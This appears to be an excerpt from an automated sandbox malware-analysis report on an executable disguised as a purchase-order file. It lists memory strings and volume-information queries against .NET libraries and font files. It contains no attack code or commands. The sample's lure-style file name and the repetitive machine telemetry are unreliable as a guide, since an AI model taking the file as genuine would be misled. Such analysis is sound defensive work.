Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdd
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$#
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdb
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDB
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDm
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDk
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDx
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$X
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$W
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDw
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$:
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$I
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q I
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$G
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDg
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDf
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$D
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$y
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$v
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh9
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$`
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh$
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$_
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh"
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$^
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD}
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD{
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$Z
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh+
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh)
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh'
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh&
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@-
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@'
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@3
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`Q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`P
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`O
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`N
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`9
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`D
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@#
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`C
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`B
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@!
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`>
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@L
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`k
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q +
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q *
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`i
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q (
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`h
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@H
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@G
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`u
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@U
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@S
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 1
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@Q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`n
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`]
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@=
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`d
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`b
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q``
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@k
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@i
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q F
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q =
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q <
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@Z
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@X

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
